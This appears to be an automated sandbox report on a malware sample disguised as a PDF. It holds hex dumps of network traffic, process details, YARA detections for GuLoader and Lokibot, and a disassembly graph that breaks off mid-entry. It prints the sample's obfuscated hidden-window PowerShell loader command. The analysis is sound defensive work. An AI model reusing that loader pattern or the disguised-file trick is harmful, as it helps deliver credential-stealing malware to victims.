                  2024-07-03 07:41:36 UTC1390INData Raw: 6d c9 99 8c cb 45 6a a8 de 3d 1f 3f 67 7d ec b4 01 22 4d c8 27 6e 61 b4 8b d8 f3 e1 bd a7 fe 6f 41 e6 16 c2 ff e5 2e f8 a7 f5 a4 e8 cd 18 f5 30 90 9a 25 ad 6d e7 d2 91 98 68 0a 17 79 99 d4 65 6b c1 3a 2c ed 04 1e 35 a2 ea 7c 6a 49 0d 4a 5d df a9 8e 94 1d 11 de 08 d6 6c 84 19 68 d0 1e 5d 5d a4 48 ca 39 c1 73 d2 21 36 1d 9f 04 96 46 6e 55 a0 cf 8e 70 99 ec ec a0 90 fa 21 0c 42 32 09 93 b8 17 83 9a 0e e2 a5 8a 8e 55 b8 08 e4 ff 54 14 f3 6c ee b9 b8 78 11 58 ce ca 2b e5 95 5d 02 5e e6 f7 e3 16 63 34 b5 7b 5a bd 63 91 7b b6 da 14 88 c1 b4 05 37 1d ae 1c 2e 8e 4e 31 9d 37 2f bd 7e 0c 2a bf 66 39 38 76 53 db 2d 3d 2a 49 eb f1 27 fb bc ab 18 e3 0a 3b 7b 02 72 9d 39 97 62 3f 3b a7 3d 8a 2b 62 de 9e a7 a4 fa 26 9e 27 fd e2 77 ff d0 30 f2 ca f8 68 2b 5c 4c cb 16 c4
                  Data Ascii: mEj=?g}"M'naoA.0%mhyek:,5|jIJ]lh]]H9s!6FnUp!B2UTlxX+]^c4{Zc{7.N17/~*f98vS-=*I';{r9b?;=+b&'w0h+\L
                  2024-07-03 07:41:36 UTC1390INData Raw: f5 39 11 d6 0b 79 55 af 61 0a b1 e9 21 5e a0 c4 f5 32 4c 06 24 5b df 95 65 8e 12 9d 88 a5 eb 12 2e a8 de 14 34 0b 27 89 2b 46 cb c1 c6 99 5e 1a f5 57 1d 2c a6 52 2f 43 40 4c f8 87 34 a0 91 5e 02 c1 6a 93 26 bf b7 47 e4 72 f1 de 05 2c 7a 03 88 3c bd 16 6b dc 4d 0f bb 77 93 d5 6b f9 0a d6 92 ab 2e bf ea 57 d8 87 ac d7 5b 27 12 d8 aa e7 d1 dc 69 48 62 a8 c6 8a 21 6e ba 46 4f ab f4 da 6a b4 d3 8d 67 79 5e ef 82 b9 52 6b 11 45 2e 11 65 ff c5 84 1a 9a 0e 81 32 e0 69 c3 92 76 18 12 7d 09 4c c1 6c 75 9d 8f 75 87 39 97 59 1f 12 2e bf 52 6e ca 3d 7b f5 86 90 dd 91 9c 61 20 c8 5e 2e f1 b0 6f 53 4c ea f2 ff 6a b5 1d f2 cb f3 4f f0 db 35 7f 81 21 0c b3 c6 33 73 93 04 2e 67 78 2d 1e 90 e2 14 9c db b6 28 02 a5 7b 07 1a 70 9f 0e 88 76 bc ed 85 f1 eb 33 25 18 78 4c d4 ac
                  Data Ascii: 9yUa!^2L$[e.4'+F^W,R/C@L4^j&Gr,z<kMwk.W['iHb!nFOjgy^RkE.e2iv}Lluu9Y.Rn={a ^.oSLjO5!3s.gx-({pv3%xL
                  2024-07-03 07:41:36 UTC1390INData Raw: 5c 79 1b 32 c9 81 e1 27 12 c8 9b 30 96 bb 53 ab 77 30 e7 c7 62 82 0d bf b1 64 d1 9a 09 c8 cd 69 af 06 d8 27 54 05 3d 3d c8 c3 8c c9 af 49 c4 52 90 f0 97 47 46 3d b3 a5 31 cd 24 05 75 9d 11 d1 e3 83 8a ac 5c a7 21 7c 1b b8 9b 4b 73 83 3c f7 33 b7 58 26 80 47 2b 30 d2 45 2b 91 c9 e5 a0 c1 75 a1 bf 50 39 2e c7 0a 97 5c 7e 03 58 3b 09 5f ce 3e 53 3d 0c 5f f1 b7 8e 3a 67 08 02 50 ed e4 6a 73 76 17 9e 82 ae a1 9e 40 04 d9 02 74 47 e6 66 06 55 b8 6f 55 8e 54 fc 5e e2 a3 ff c8 ee e2 1a 03 f9 d4 57 3d eb bb e6 ea a0 73 e9 cf 5c c3 dd fb 3c 54 22 81 c4 c9 78 2c 49 59 6d e7 0d 27 d0 45 26 34 10 69 8d 78 97 02 64 eb 8a 8b 30 62 30 8b 54 9c 12 09 44 2e d4 52 6a d3 bd 75 ef e3 47 d1 a2 46 48 7c 19 b5 13 3b e5 e7 fe eb 7f 77 32 b4 3b 86 0b fe 9a 66 60 8e 68 cb 1a 5c 56
                  Data Ascii: \y2'0Sw0bdi'T==IRGF=1$u\!|Ks<3X&G+0E+uP9.\~X;_>S=_:gPjsv@tGfUoUT^W=s\<T"x,IYm'E&4ixd0b0TD.RjuGFH|;w2;f`h\V
                  2024-07-03 07:41:36 UTC1390INData Raw: c6 81 be 11 68 df b2 e8 06 d7 cb 42 0e 54 0d 70 32 42 4b b7 80 39 7f 67 e8 0a 7d 02 db e2 8e a4 82 2f 04 9b 64 7d 77 c2 9e 59 b1 d0 79 8c 7d d8 1d f5 42 71 3a d6 4d a4 bb 40 2f 16 5e 6c 2a 23 f9 9c 2f 0d 7c 0e 7e 3c d9 8a 2e fc 60 3d 6b 70 b0 d0 e9 7f 5e 1d ba d8 56 34 64 a9 5c c9 ce 75 a5 f3 29 e2 87 5b 4e 82 90 d1 01 73 6b e8 d9 9a 76 0e 96 be 53 96 11 49 50 86 88 3a fc dc c4 1b d5 a4 37 a2 9d be bb 82 21 ea 52 af e8 2c df b3 d2 bb bc 65 a4 54 1a 3d 6e e3 e7 1e 73 f2 b9 ae dd be 46 7a 4e 43 c4 ba 24 43 f9 7f 58 f2 73 5b bc ad 58 a5 63 f6 71 29 36 11 f7 05 e5 5f 45 cf 3b 7c 11 a0 1c 60 d0 4c 4a 29 c6 98 1a 94 52 b2 2c 25 cd b7 59 1b 32 58 bf 05 1a 52 87 ef 49 90 be 74 70 54 fc a9 b9 28 25 46 48 28 4b f6 8a 61 eb 46 20 75 dc 9b 24 a0 21 f0 43 3e d7 58 43
                  Data Ascii: hBTp2BK9g}/d}wYy}Bq:M@/^l*#/|~<.`=kp^V4d\u)[NskvSIP:7!R,eT=nsFzNC$CXs[Xcq)6_E;|`LJ)R,%Y2XRItpT(%FH(KaF u$!C>XC
                  2024-07-03 07:41:36 UTC1390INData Raw: 88 e5 77 3e 5d 14 17 c9 2a 5c 38 b6 8f 34 8b 1d 03 e8 48 cb 6c 08 85 f3 6f 0f 43 5f c0 fe 7a ec 0f 81 72 1d f5 b4 c2 c3 60 a7 3b d2 d8 98 ee 0a c8 36 6d 11 1f 43 39 80 26 bb fb c9 f2 31 0f 27 0b c1 a2 ab 05 a0 f1 19 cd 39 8a d6 c5 ae b6 0b 02 9a 30 91 24 65 2e f9 f3 43 ed b2 55 09 d1 40 ae 37 25 5e 14 d3 ef b3 84 7b 1a 83 32 cb 3b 57 8b 45 02 f0 ca 6a e8 7b b0 75 c3 bd b0 a5 05 f1 30 fc 1e bf d2 2a 03 b5 11 7c 0b 14 86 45 8d 15 2e 96 ed 88 90 1e 48 44 b2 2e f8 c5 8e f8 6c ef 15 55 72 8d 05 27 86 9f 91 d6 38 b6 b8 3d b4 aa e9 2e 92 c7 bd b3 6e 1e f5 ca 7d 04 7a 46 c8 25 77 03 b4 13 67 17 a4 f4 89 60 2f e5 fd 97 af 16 3a fd fa 24 c4 47 f1 e7 ff 6b 27 bb 49 d2 d3 48 68 a3 b9 fc ec 7d b0 d4 f2 94 19 53 ac 4f fb e5 ff 3f 33 7b 94 b8 82 06 f2 50 3d 46 e9 4a 1b
                  Data Ascii: w>]*\84HloC_zr`;6mC9&1'90$e.CU@7%^{2;WEj{u0*|E.HD.lUr'8=.n}zF%wg`/:$Gk'IHh}SO?3{P=FJ
                  2024-07-03 07:41:36 UTC1390INData Raw: 85 94 48 bd d3 9a 1b d2 da 93 d5 05 5d f5 8f bf 82 fa b9 5c 1c 69 3c 27 ad bc be fe 39 7f 71 37 13 1f ab a4 cf 7a 42 eb df 39 ba 55 93 90 4f 05 e5 36 da ff e7 f7 2d 57 4d 30 40 27 8f 05 75 08 37 d7 fc f0 38 7b 14 52 49 9b ee 68 44 e7 60 e0 52 6e 33 50 90 02 b2 a4 39 95 80 7d e5 b5 a9 55 d2 c4 e0 67 6d da 9e 14 36 15 ff 43 8c cb 44 bd 7e 2a 97 46 49 e7 53 16 2a 62 1f d2 95 0f 78 dd 1e 85 99 17 27 72 88 b0 9e ed cf 4a 6d e4 51 da d1 7f 84 bb e3 0f 8e 92 a7 27 2c 63 7d 48 16 ff 4f b4 1c 75 b7 c6 b2 34 5d c3 db f1 57 c5 10 b9 01 44 7c 9f 11 0f 6f 72 62 a1 b6 de c9 bb 6e 5c 0e cf 21 40 35 e2 02 68 0a b1 c1 04 63 70 69 79 8f e0 3d 80 0d 49 b1 a5 a9 1c 81 1b 46 e5 c5 7d 08 35 1d b8 2d 2a 8d fb 8a 2e 0d e2 89 a1 2b b8 e1 a7 fa 4f 9f a0 e1 6f b4 a4 6d c7 f9 ec fe
                  Data Ascii: H]\i<'9q7zB9UO6-WM0@'u78{RIhD`Rn3P9}Ugm6CD~*FIS*bx'rJmQ',c}HOu4]WD|orbn\!@5hcpiy=IF}5-*.+Oom


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:03:40:55
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"
                  Imagebase:0x400000
                  File size:935'680 bytes
                  MD5 hash:811A6608BD141B5C41CCEAA9D1E7EE52
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:03:40:57
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"
                  Imagebase:0x190000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1611756970.0000000009A72000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:03:40:57
                  Start date:03/07/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:05:28:04
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                  Imagebase:0xe00000
                  File size:516'608 bytes
                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000E.00000002.2447479281.00000000059D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.2440927525.00000000030F2000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:false

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:40.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:23.7%
                    Total number of Nodes:482
                    Total number of Limit Nodes:11
                    execution_graph 1239 403311 SetErrorMode GetVersion 1240 403346 1239->1240 1241 40334c 1239->1241 1242 40649b 5 API calls 1240->1242 1327 40642b GetSystemDirectoryW 1241->1327 1242->1241 1244 403362 lstrlenA 1244->1241 1245 403372 1244->1245 1330 40649b GetModuleHandleA 1245->1330 1248 40649b 5 API calls 1249 403381 #17 OleInitialize SHGetFileInfoW 1248->1249 1336 4060c1 lstrcpynW 1249->1336 1251 4033be GetCommandLineW 1337 4060c1 lstrcpynW 1251->1337 1253 4033d0 GetModuleHandleW 1254 4033e8 1253->1254 1338 405aa2 1254->1338 1257 403521 GetTempPathW 1342 4032e0 1257->1342 1259 403539 1260 403593 DeleteFileW 1259->1260 1261 40353d GetWindowsDirectoryW lstrcatW 1259->1261 1352 402e82 GetTickCount GetModuleFileNameW 1260->1352 1262 4032e0 12 API calls 1261->1262 1265 403559 1262->1265 1263 405aa2 CharNextW 1267 403410 1263->1267 1265->1260 1268 40355d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 1265->1268 1266 4035a7 1269 40365a 1266->1269 1274 40364a 1266->1274 1278 405aa2 CharNextW 1266->1278 1267->1263 1271 40350c 1267->1271 1273 40350a 1267->1273 1272 4032e0 12 API calls 1268->1272 1487 403830 1269->1487 1470 4060c1 lstrcpynW 1271->1470 1276 40358b 1272->1276 1273->1257 1380 40390a 1274->1380 1276->1260 1276->1269 1291 4035c6 1278->1291 1280 403794 1283 403818 ExitProcess 1280->1283 1284 40379c GetCurrentProcess OpenProcessToken 1280->1284 1281 403674 1494 405806 1281->1494 1289 4037b4 LookupPrivilegeValueW AdjustTokenPrivileges 1284->1289 1290 4037e8 1284->1290 1287 403624 1471 405b7d 1287->1471 1288 40368a 1436 405789 1288->1436 1289->1290 1294 40649b 5 API calls 1290->1294 1291->1287 1291->1288 1297 4037ef 1294->1297 1300 403804 ExitWindowsEx 1297->1300 1301 403811 1297->1301 1298 4036a0 lstrcatW 1299 4036ab lstrcatW lstrcmpiW 1298->1299 1299->1269 1303 4036c7 1299->1303 1300->1283 1300->1301 1502 40140b 1301->1502 1306 4036d3 1303->1306 1307 4036cc 1303->1307 1305 40363f 1486 4060c1 lstrcpynW 1305->1486 1498 40576c CreateDirectoryW 1306->1498 1439 4056ef CreateDirectoryW 1307->1439 1311 4036d8 SetCurrentDirectoryW 1313 4036f3 1311->1313 1314 4036e8 1311->1314 1444 4060c1 lstrcpynW 1313->1444 1501 4060c1 lstrcpynW 1314->1501 1319 40373f CopyFileW 1324 403701 1319->1324 1320 403788 1321 405f62 38 API calls 1320->1321 1321->1269 1323 4060e3 18 API calls 1323->1324 1324->1320 1324->1323 1326 403773 CloseHandle 1324->1326 1445 4060e3 1324->1445 1463 405f62 MoveFileExW 1324->1463 1467 4057a1 CreateProcessW 1324->1467 1326->1324 1328 40644d wsprintfW LoadLibraryExW 1327->1328 1328->1244 1331 4064c1 GetProcAddress 1330->1331 1332 4064b7 1330->1332 1334 40337a 1331->1334 1333 40642b 3 API calls 1332->1333 1335 4064bd 1333->1335 1334->1248 1335->1331 1335->1334 1336->1251 1337->1253 1339 405aa8 1338->1339 1340 4033f7 CharNextW 1339->1340 1341 405aaf CharNextW 1339->1341 1340->1257 1340->1267 1341->1339 1505 406355 1342->1505 1344 4032ec 1345 4032f6 1344->1345 1514 405a75 lstrlenW CharPrevW 1344->1514 1345->1259 1348 40576c 2 API calls 1349 403304 1348->1349 1517 405cc5 1349->1517 1521 405c96 GetFileAttributesW CreateFileW 1352->1521 1354 402ec2 1375 402ed2 1354->1375 1522 4060c1 lstrcpynW 1354->1522 1356 402ee8 1523 405ac1 lstrlenW 1356->1523 1360 402ef9 GetFileSize 1361 402ff5 1360->1361 1373 402f10 1360->1373 1528 402e1e 1361->1528 1363 402ffe 1365 40302e GlobalAlloc 1363->1365 1363->1375 1563 4032c9 SetFilePointer 1363->1563 1539 4032c9 SetFilePointer 1365->1539 1367 403061 1371 402e1e 6 API calls 1367->1371 1369 403017 1372 4032b3 ReadFile 1369->1372 1370 403049 1540 4030bb 1370->1540 1371->1375 1376 403022 1372->1376 1373->1361 1373->1367 1373->1375 1377 402e1e 6 API calls 1373->1377 1560 4032b3 1373->1560 1375->1266 1376->1365 1376->1375 1377->1373 1378 403055 1378->1375 1378->1378 1379 403092 SetFilePointer 1378->1379 1379->1375 1381 40649b 5 API calls 1380->1381 1382 40391e 1381->1382 1383 403924 1382->1383 1384 403936 1382->1384 1593 406008 wsprintfW 1383->1593 1594 405f8e RegOpenKeyExW 1384->1594 1388 403985 lstrcatW 1389 403934 1388->1389 1584 403be0 1389->1584 1390 405f8e 3 API calls 1390->1388 1393 405b7d 18 API calls 1394 4039b7 1393->1394 1395 403a4b 1394->1395 1397 405f8e 3 API calls 1394->1397 1396 405b7d 18 API calls 1395->1396 1398 403a51 1396->1398 1399 4039e9 1397->1399 1400 403a61 LoadImageW 1398->1400 1401 4060e3 18 API calls 1398->1401 1399->1395 1404 403a0a lstrlenW 1399->1404 1407 405aa2 CharNextW 1399->1407 1402 403b07 1400->1402 1403 403a88 RegisterClassW 1400->1403 1401->1400 1406 40140b 2 API calls 1402->1406 1405 403abe SystemParametersInfoW CreateWindowExW 1403->1405 1435 403b11 1403->1435 1408 403a18 lstrcmpiW 1404->1408 1409 403a3e 1404->1409 1405->1402 1410 403b0d 1406->1410 1412 403a07 1407->1412 1408->1409 1413 403a28 GetFileAttributesW 1408->1413 1411 405a75 3 API calls 1409->1411 1414 403be0 19 API calls 1410->1414 1410->1435 1415 403a44 1411->1415 1412->1404 1416 403a34 1413->1416 1417 403b1e 1414->1417 1599 4060c1 lstrcpynW 1415->1599 1416->1409 1419 405ac1 2 API calls 1416->1419 1420 403b2a ShowWindow 1417->1420 1421 403bad 1417->1421 1419->1409 1422 40642b 3 API calls 1420->1422 1600 4052f3 OleInitialize 1421->1600 1425 403b42 1422->1425 1424 403bb3 1426 403bb7 1424->1426 1427 403bcf 1424->1427 1428 403b50 GetClassInfoW 1425->1428 1430 40642b 3 API calls 1425->1430 1433 40140b 2 API calls 1426->1433 1426->1435 1429 40140b 2 API calls 1427->1429 1431 403b64 GetClassInfoW RegisterClassW 1428->1431 1432 403b7a DialogBoxParamW 1428->1432 1429->1435 1430->1428 1431->1432 1434 40140b 2 API calls 1432->1434 1433->1435 1434->1435 1435->1269 1437 40649b 5 API calls 1436->1437 1438 40368f lstrcatW 1437->1438 1438->1298 1438->1299 1440 405740 GetLastError 1439->1440 1441 4036d1 1439->1441 1440->1441 1442 40574f SetFileSecurityW 1440->1442 1441->1311 1442->1441 1443 405765 GetLastError 1442->1443 1443->1441 1444->1324 1461 4060f0 1445->1461 1446 40633b 1447 403732 DeleteFileW 1446->1447 1617 4060c1 lstrcpynW 1446->1617 1447->1319 1447->1324 1449 4061a3 GetVersion 1449->1461 1450 406309 lstrlenW 1450->1461 1453 4060e3 10 API calls 1453->1450 1454 405f8e 3 API calls 1454->1461 1455 40621e GetSystemDirectoryW 1455->1461 1456 406231 GetWindowsDirectoryW 1456->1461 1457 406355 5 API calls 1457->1461 1458 406265 SHGetSpecialFolderLocation 1458->1461 1462 40627d SHGetPathFromIDListW CoTaskMemFree 1458->1462 1459 4060e3 10 API calls 1459->1461 1460 4062aa lstrcatW 1460->1461 1461->1446 1461->1449 1461->1450 1461->1453 1461->1454 1461->1455 1461->1456 1461->1457 1461->1458 1461->1459 1461->1460 1615 406008 wsprintfW 1461->1615 1616 4060c1 lstrcpynW 1461->1616 1462->1461 1464 405f83 1463->1464 1465 405f76 1463->1465 1464->1324 1618 405df0 lstrcpyW 1465->1618 1468 4057e0 1467->1468 1469 4057d4 CloseHandle 1467->1469 1468->1324 1469->1468 1470->1273 1652 4060c1 lstrcpynW 1471->1652 1473 405b8e 1653 405b20 CharNextW CharNextW 1473->1653 1476 403630 1476->1269 1485 4060c1 lstrcpynW 1476->1485 1477 406355 5 API calls 1480 405ba4 1477->1480 1478 405bd5 lstrlenW 1479 405be0 1478->1479 1478->1480 1481 405a75 3 API calls 1479->1481 1480->1476 1480->1478 1484 405ac1 2 API calls 1480->1484 1659 406404 FindFirstFileW 1480->1659 1483 405be5 GetFileAttributesW 1481->1483 1483->1476 1484->1478 1485->1305 1486->1274 1488 403848 1487->1488 1489 40383a CloseHandle 1487->1489 1662 403875 1488->1662 1489->1488 1496 40581b 1494->1496 1495 403682 ExitProcess 1496->1495 1497 40582f MessageBoxIndirectW 1496->1497 1497->1495 1499 405780 GetLastError 1498->1499 1500 40577c 1498->1500 1499->1500 1500->1311 1501->1313 1503 401389 2 API calls 1502->1503 1504 401420 1503->1504 1504->1283 1512 406362 1505->1512 1506 4063d8 1507 4063dd CharPrevW 1506->1507 1509 4063fe 1506->1509 1507->1506 1508 4063cb CharNextW 1508->1506 1508->1512 1509->1344 1510 405aa2 CharNextW 1510->1512 1511 4063b7 CharNextW 1511->1512 1512->1506 1512->1508 1512->1510 1512->1511 1513 4063c6 CharNextW 1512->1513 1513->1508 1515 405a91 lstrcatW 1514->1515 1516 4032fe 1514->1516 1515->1516 1516->1348 1518 405cd2 GetTickCount GetTempFileNameW 1517->1518 1519 40330f 1518->1519 1520 405d08 1518->1520 1519->1259 1520->1518 1520->1519 1521->1354 1522->1356 1524 405acf 1523->1524 1525 402eee 1524->1525 1526 405ad5 CharPrevW 1524->1526 1527 4060c1 lstrcpynW 1525->1527 1526->1524 1526->1525 1527->1360 1529 402e27 1528->1529 1530 402e3f 1528->1530 1531 402e30 DestroyWindow 1529->1531 1532 402e37 1529->1532 1533 402e47 1530->1533 1534 402e4f GetTickCount 1530->1534 1531->1532 1532->1363 1564 4064d7 1533->1564 1536 402e80 1534->1536 1537 402e5d CreateDialogParamW ShowWindow 1534->1537 1536->1363 1537->1536 1539->1370 1542 4030d4 1540->1542 1541 403102 1544 4032b3 ReadFile 1541->1544 1542->1541 1581 4032c9 SetFilePointer 1542->1581 1545 40310d 1544->1545 1546 40324c 1545->1546 1547 40311f GetTickCount 1545->1547 1549 403236 1545->1549 1548 40328e 1546->1548 1553 403250 1546->1553 1547->1549 1556 40314b 1547->1556 1550 4032b3 ReadFile 1548->1550 1549->1378 1550->1549 1551 4032b3 ReadFile 1551->1556 1552 4032b3 ReadFile 1552->1553 1553->1549 1553->1552 1554 405d48 WriteFile 1553->1554 1554->1553 1555 4031a1 GetTickCount 1555->1556 1556->1549 1556->1551 1556->1555 1557 4031c6 MulDiv wsprintfW 1556->1557 1579 405d48 WriteFile 1556->1579 1568 405220 1557->1568 1582 405d19 ReadFile 1560->1582 1563->1369 1565 4064f4 PeekMessageW 1564->1565 1566 402e4d 1565->1566 1567 4064ea DispatchMessageW 1565->1567 1566->1363 1567->1565 1569 4052dd 1568->1569 1571 40523b 1568->1571 1569->1556 1570 405257 lstrlenW 1573 405280 1570->1573 1574 405265 lstrlenW 1570->1574 1571->1570 1572 4060e3 18 API calls 1571->1572 1572->1570 1576 405293 1573->1576 1577 405286 SetWindowTextW 1573->1577 1574->1569 1575 405277 lstrcatW 1574->1575 1575->1573 1576->1569 1578 405299 SendMessageW SendMessageW SendMessageW 1576->1578 1577->1576 1578->1569 1580 405d66 1579->1580 1580->1556 1581->1541 1583 4032c6 1582->1583 1583->1373 1585 403bf4 1584->1585 1607 406008 wsprintfW 1585->1607 1587 403c65 1588 4060e3 18 API calls 1587->1588 1589 403c71 SetWindowTextW 1588->1589 1590 403995 1589->1590 1591 403c8d 1589->1591 1590->1393 1591->1590 1592 4060e3 18 API calls 1591->1592 1592->1591 1593->1389 1595 403966 1594->1595 1596 405fc2 RegQueryValueExW 1594->1596 1595->1388 1595->1390 1597 405fe3 RegCloseKey 1596->1597 1597->1595 1599->1395 1608 4041d1 1600->1608 1602 4041d1 SendMessageW 1603 40534f OleUninitialize 1602->1603 1603->1424 1605 40533d 1605->1602 1606 405316 1606->1605 1611 401389 1606->1611 1607->1587 1609 4041e9 1608->1609 1610 4041da SendMessageW 1608->1610 1609->1606 1610->1609 1613 401390 1611->1613 1612 4013fe 1612->1606 1613->1612 1614 4013cb MulDiv SendMessageW 1613->1614 1614->1613 1615->1461 1616->1461 1617->1447 1619 405e18 1618->1619 1620 405e3e GetShortPathNameW 1618->1620 1645 405c96 GetFileAttributesW CreateFileW 1619->1645 1622 405e53 1620->1622 1623 405f5d 1620->1623 1622->1623 1625 405e5b wsprintfA 1622->1625 1623->1464 1624 405e22 CloseHandle GetShortPathNameW 1624->1623 1627 405e36 1624->1627 1626 4060e3 18 API calls 1625->1626 1628 405e83 1626->1628 1627->1620 1627->1623 1646 405c96 GetFileAttributesW CreateFileW 1628->1646 1630 405e90 1630->1623 1631 405e9f GetFileSize GlobalAlloc 1630->1631 1632 405ec1 1631->1632 1633 405f56 CloseHandle 1631->1633 1634 405d19 ReadFile 1632->1634 1633->1623 1635 405ec9 1634->1635 1635->1633 1647 405bfb lstrlenA 1635->1647 1638 405ee0 lstrcpyA 1642 405f02 1638->1642 1639 405ef4 1640 405bfb 4 API calls 1639->1640 1640->1642 1641 405f39 SetFilePointer 1643 405d48 WriteFile 1641->1643 1642->1641 1644 405f4f GlobalFree 1643->1644 1644->1633 1645->1624 1646->1630 1648 405c3c lstrlenA 1647->1648 1649 405c44 1648->1649 1650 405c15 lstrcmpiA 1648->1650 1649->1638 1649->1639 1650->1649 1651 405c33 CharNextA 1650->1651 1651->1648 1652->1473 1654 405b3d 1653->1654 1656 405b4f 1653->1656 1654->1656 1657 405b4a CharNextW 1654->1657 1655 405b73 1655->1476 1655->1477 1656->1655 1658 405aa2 CharNextW 1656->1658 1657->1655 1658->1656 1660 406425 1659->1660 1661 40641a FindClose 1659->1661 1660->1480 1661->1660 1664 403883 1662->1664 1663 40384d 1666 4058b2 1663->1666 1664->1663 1665 403888 FreeLibrary GlobalFree 1664->1665 1665->1663 1665->1665 1667 405b7d 18 API calls 1666->1667 1668 4058d2 1667->1668 1669 4058f1 1668->1669 1670 4058da DeleteFileW 1668->1670 1672 405a11 1669->1672 1703 4060c1 lstrcpynW 1669->1703 1671 403663 OleUninitialize 1670->1671 1671->1280 1671->1281 1672->1671 1679 406404 2 API calls 1672->1679 1674 405917 1675 40592a 1674->1675 1676 40591d lstrcatW 1674->1676 1678 405ac1 2 API calls 1675->1678 1677 405930 1676->1677 1680 405940 lstrcatW 1677->1680 1682 40594b lstrlenW FindFirstFileW 1677->1682 1678->1677 1681 405a36 1679->1681 1680->1682 1681->1671 1683 405a75 3 API calls 1681->1683 1682->1672 1695 40596d 1682->1695 1684 405a40 1683->1684 1686 40586a 5 API calls 1684->1686 1685 4059f4 FindNextFileW 1689 405a0a FindClose 1685->1689 1685->1695 1688 405a4c 1686->1688 1690 405a50 1688->1690 1691 405a66 1688->1691 1689->1672 1690->1671 1696 405220 25 API calls 1690->1696 1693 405220 25 API calls 1691->1693 1693->1671 1694 4058b2 62 API calls 1701 4059be 1694->1701 1695->1685 1695->1694 1695->1701 1704 4060c1 lstrcpynW 1695->1704 1705 40586a 1695->1705 1697 405a5d 1696->1697 1698 405f62 38 API calls 1697->1698 1698->1671 1699 405220 25 API calls 1699->1685 1700 405220 25 API calls 1700->1701 1701->1685 1701->1699 1701->1700 1702 405f62 38 API calls 1701->1702 1702->1701 1703->1674 1704->1695 1713 405c71 GetFileAttributesW 1705->1713 1708 405897 1708->1695 1709 405885 RemoveDirectoryW 1711 405893 1709->1711 1710 40588d DeleteFileW 1710->1711 1711->1708 1712 4058a3 SetFileAttributesW 1711->1712 1712->1708 1714 405876 1713->1714 1715 405c83 SetFileAttributesW 1713->1715 1714->1708 1714->1709 1714->1710 1715->1714 1809 402d98 1810 402dc3 1809->1810 1811 402daa SetTimer 1809->1811 1812 402e18 1810->1812 1813 402ddd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 1810->1813 1811->1810 1813->1812 1716 403cad 1717 403e00 1716->1717 1718 403cc5 1716->1718 1720 403e11 GetDlgItem GetDlgItem 1717->1720 1721 403e51 1717->1721 1718->1717 1719 403cd1 1718->1719 1723 403cdc SetWindowPos 1719->1723 1724 403cef 1719->1724 1725 404185 19 API calls 1720->1725 1722 403eab 1721->1722 1730 401389 2 API calls 1721->1730 1726 4041d1 SendMessageW 1722->1726 1746 403dfb 1722->1746 1723->1724 1727 403cf4 ShowWindow 1724->1727 1728 403d0c 1724->1728 1729 403e3b SetClassLongW 1725->1729 1776 403ebd 1726->1776 1727->1728 1731 403d14 DestroyWindow 1728->1731 1732 403d2e 1728->1732 1733 40140b 2 API calls 1729->1733 1736 403e83 1730->1736 1785 40410e 1731->1785 1734 403d33 SetWindowLongW 1732->1734 1735 403d44 1732->1735 1733->1721 1734->1746 1737 403d50 GetDlgItem 1735->1737 1738 403ded 1735->1738 1736->1722 1739 403e87 SendMessageW 1736->1739 1742 403d63 SendMessageW IsWindowEnabled 1737->1742 1748 403d80 1737->1748 1795 4041ec 1738->1795 1739->1746 1740 40140b 2 API calls 1740->1776 1741 404110 DestroyWindow EndDialog 1741->1785 1742->1746 1742->1748 1744 40413f ShowWindow 1744->1746 1745 4060e3 18 API calls 1745->1776 1747 403d85 1792 40415e 1747->1792 1748->1747 1749 403d8d 1748->1749 1752 403dd4 SendMessageW 1748->1752 1753 403da0 1748->1753 1749->1747 1749->1752 1751 404185 19 API calls 1751->1776 1752->1738 1755 403da8 1753->1755 1756 403dbd 1753->1756 1754 403dbb 1754->1738 1758 40140b 2 API calls 1755->1758 1757 40140b 2 API 